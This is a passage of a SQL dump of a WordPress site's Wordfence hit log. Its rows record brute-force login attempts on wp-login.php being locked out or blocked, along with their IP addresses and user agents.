(5274, 1596011185.255050, 1596011185.141100, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5275, 1596013715.225870, 1596013715.182100, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5276, 1596016403.052426, 1596016402.951600, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5277, 1596018990.047723, 1596018989.982600, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5278, 0.000000, 1596019034.441679, 0x00000000000000000000ffffb956a46e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5279, 1596021340.993443, 1596021340.917000, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5280, 1596022473.547290, 1596022473.455900, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5281, 1596023393.567996, 1596023393.425900, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5282, 1596024367.074530, 1596024367.014200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}');
INSERT INTO `zdenl_wfhits` (`id`, `attackLogTime`, `ctime`, `IP`, `jsRun`, `statusCode`, `isGoogle`, `userID`, `newVisit`, `URL`, `referer`, `UA`, `action`, `actionDescription`, `actionData`) VALUES
(5283, 1596025754.294655, 1596025754.251800, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5284, 0.000000, 1596026422.234643, 0x00000000000000000000ffffb977510b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5285, 1596028343.857924, 1596028343.790400, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5286, 1596030885.802614, 1596030885.759200, 0x00000000000000000000ffff05bc3e93, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', NULL, 'Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36', 'lockedOut', 'Exceeded the maximum number of login failures which is: 3. The last username they tried to sign in with was: \'ze-dent\'', '{\"learningMode\":0,\"failedRules\":\"\",\"paramKey\":\"\",\"paramValue\":\"\",\"path\":\"L3dwLWxvZ2luLnBocA==\"}'),
(5287, 0.000000, 1596046434.378201, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5288, 0.000000, 1596055833.998819, 0x00000000000000000000ffffc063055e, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5289, 0.000000, 1596056262.562692, 0x00000000000000000000ffffc063043f, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5290, 0.000000, 1596057956.548946, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5291, 0.000000, 1596065092.717710, 0x00000000000000000000ffffb9dc650a, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0', 'loginFailInvalidUsername', NULL, NULL),
(5292, 0.000000, 1596067691.546479, 0x00000000000000000000ffffb956a462, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5293, 0.000000, 1596081555.123719, 0x00000000000000000000ffffb956a464, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5294, 0.000000, 1596085751.972716, 0x00000000000000000000ffffb956a462, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5295, 0.000000, 1596098626.532508, 0x00000000000000000000ffffb956a466, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5296, 0.000000, 1596102892.729738, 0x00000000000000000000ffff452e2414, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/?_wfsf=detectProxy', '', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.82 Safari/537.1', 'scan:detectproxy', NULL, NULL),
(5297, 0.000000, 1596103626.375994, 0x00000000000000000000ffffb956a463, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5298, 0.000000, 1596113154.683931, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5299, 0.000000, 1596123820.118257, 0x00000000000000000000ffffb955be84, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5300, 0.000000, 1596134797.104900, 0x00000000000000000000ffff253b386b, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5301, 0.000000, 1596141960.407549, 0x00000000000000000000ffffb955be84, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5302, 0.000000, 1596154430.880925, 0x00000000000000000000ffffb956a46b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5303, 0.000000, 1596174249.101244, 0x00000000000000000000ffffb956a465, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5304, 0.000000, 1596184110.553242, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5305, 0.000000, 1596194079.141123, 0x00000000000000000000ffffb956a468, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5306, 0.000000, 1596200075.503476, 0x00000000000000000000ffffdfd7bd88, 0, 200, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'https://drydry.uz/wp-login.php', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15', 'loginFailInvalidUsername', NULL, NULL),
(5307, 0.000000, 1596202277.401398, 0x00000000000000000000ffffb956a465, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5308, 0.000000, 1596203655.095628, 0x00000000000000000000ffff2e659609, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5309, 0.000000, 1596211494.421005, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5310, 0.000000, 1596212657.567247, 0x00000000000000000000ffffc0630230, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5311, 0.000000, 1596221050.600907, 0x00000000000000000000ffffb956a46f, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5312, 0.000000, 1596221946.050737, 0x00000000000000000000ffff5e17d2c8, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36', 'loginFailInvalidUsername', NULL, NULL),
(5313, 0.000000, 1596228652.507776, 0x00000000000000000000ffff80c7f9d5, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5314, 0.000000, 1596232506.958213, 0x00000000000000000000ffffb956a466, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5315, 0.000000, 1596237419.856284, 0x00000000000000000000ffff3ed21bb7, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5316, 0.000000, 1596238377.124788, 0x00000000000000000000ffffb9560dd5, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5317, 0.000000, 1596241247.093902, 0x00000000000000000000ffff5b7959bd, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5318, 0.000000, 1596249229.214335, 0x00000000000000000000ffffadece073, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5319, 0.000000, 1596250518.359377, 0x00000000000000000000ffffb956a467, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5320, 0.000000, 1596256430.850193, 0x00000000000000000000ffffa7473111, 0, 200, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'loginFailInvalidUsername', NULL, NULL),
(5321, 0.000000, 1596257403.227569, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5322, 0.000000, 1596262346.859512, 0x00000000000000000000ffffadec9d55, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5323, 0.000000, 1596268746.903097, 0x00000000000000000000ffff2e6587bd, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5324, 0.000000, 1596269324.205785, 0x00000000000000000000ffffb977510b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5325, 0.000000, 1596276072.012475, 0x00000000000000000000ffff80c76b21, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5326, 0.000000, 1596292413.023159, 0x00000000000000000000ffff334b7b07, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5327, 0.000000, 1596292938.718126, 0x00000000000000000000ffffb956a468, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5328, 0.000000, 1596298357.224237, 0x00000000000000000000ffffc063c845, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5329, 0.000000, 1596300051.985877, 0x00000000000000000000ffffb956a704, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5330, 0.000000, 1596304076.451461, 0x00000000000000000000ffff3625fe0e, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5331, 0.000000, 1596309270.788385, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5332, 0.000000, 1596309742.432951, 0x00000000000000000000ffff8ac5ab42, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5333, 0.000000, 1596315679.290399, 0x00000000000000000000ffffcebd809e, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5334, 0.000000, 1596322098.841200, 0x00000000000000000000ffffb956a465, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5335, 0.000000, 1596322445.528392, 0x00000000000000000000ffff6883d077, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5336, 0.000000, 1596330176.577085, 0x00000000000000000000ffff8ac5ab42, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5337, 0.000000, 1596331304.412493, 0x00000000000000000000ffffb956a466, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5338, 0.000000, 1596331864.489110, 0x00000000000000000000ffff339e1bf2, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5339, 0.000000, 1596338587.575655, 0x00000000000000000000ffff94481f76, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5340, 0.000000, 1596340581.578993, 0x00000000000000000000ffffb955eef4, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5341, 0.000000, 1596345141.139176, 0x00000000000000000000ffff9df5854e, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5342, 0.000000, 1596348687.202509, 0x00000000000000000000ffffb955ef6e, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5343, 0.000000, 1596350805.652156, 0x00000000000000000000ffffc60cfabb, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5344, 0.000000, 1596357428.785425, 0x00000000000000000000ffff86d19756, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5345, 0.000000, 1596360520.831283, 0x00000000000000000000ffffb956a462, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5346, 0.000000, 1596364924.302273, 0x00000000000000000000ffff51aaef02, 0, 503, 0, 0, 0, 'http://ze-dent.com/wp-login.php', '', 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5347, 0.000000, 1596367378.328132, 0x00000000000000000000ffffb955efc3, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
(5348, 0.000000, 1596379235.964254, 0x00000000000000000000ffffb956a46b, 0, 503, 0, 0, 0, 'http://www.ze-dent.com/wp-login.php', 'http://ze-dent.com/wp-login.php', 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36', 'blocked:wfsn', 'Blocked by Wordfence Security Network', NULL),
